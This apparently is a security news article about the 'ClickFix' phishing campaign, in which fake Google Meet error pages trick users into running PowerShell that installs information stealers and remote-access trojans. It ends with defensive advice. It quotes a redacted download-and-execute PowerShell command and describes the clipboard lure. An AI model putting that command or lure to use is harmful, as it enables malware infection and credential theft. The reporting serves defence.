A new phishing campaign, dubbed “ClickFix,” is using fake Google Meet pages to trick users into copying and running malicious PowerShell commands. The attack leads to infections with dangerous information-stealing malware, including AsyncRAT, StealC, and Rhadamanthys.This method highlights a growing trend in cybercrime where attackers rely on human error rather than software vulnerabilities to gain access to systems.
How the Attack Works
According to security researchers at Sucuri, the attack begins with phishing emails disguised as Google Meet invitations. These emails link to fake domains like meet.google.us-join.com or meet.googie.com-join.us.
Once users click the link, they see a fake Google Meet interface that mimics real error messages, such as “Microphone Permission Denied.” The page looks legitimate and is designed to appear like a common tech problem.
When users click a fake “Try Fix” button, a JavaScript function silently copies a malicious PowerShell command to their clipboard. They are then instructed to paste and run the command using Win+R and Ctrl+V.
The copied command resembles this format:
powershell -w 1 iwr hxxp://[REDACTED]/1/XR.txt -UseBasicParsing|iexThis command downloads a hidden script from a hacked website and runs it directly in memory, avoiding antivirus detection.
Malware Delivered
The downloaded file, often named XR.txt, contains heavily scrambled PowerShell code. This code uses techniques like XOR decoding and regular expressions to rebuild itself at runtime and run silently.
Victims may see a fake “Verification Complete” message, meant to reassure them while malicious code installs in the background.
The malware includes:
- AsyncRAT – for remote control of infected devices
- StealC and Rhadamanthys – to steal browser data, credentials, and more
- Atomic Stealer – targeting macOS users through fake disk image files
The malware typically hides in the user’s AppData directory and sets up hidden scripts for persistence using environment variables and batch files.
Why This Attack Is Dangerous
ClickFix bypasses traditional defenses because it relies on users taking manual steps, like running commands themselves. This allows it to avoid detection by tools like Google Safe Browsing or email filters.
Security researchers have linked this method to groups such as TA571, Slavic Nation Empire, and Scamquerteo. The campaign has been active since early 2024 and targets multiple industries.
How to Protect Against This Threat
To defend against ClickFix and similar attacks, experts recommend the following steps:
- Training: Educate employees that legitimate services will never ask them to run PowerShell commands from email instructions.
- Monitoring: Use Endpoint Detection and Response (EDR) tools to track PowerShell usage and detect unusual behavior.
- Web Filtering: Block known phishing domains and malicious websites using web application firewalls.
- Access Controls: Restrict access to scripting tools and enforce strong user permission policies.
- Regular Scans: Run updated antivirus and anti-malware tools regularly to catch infections early.
Preventing attacks like ClickFix requires a layered approach—combining technology with human awareness to reduce the risk of compromise.
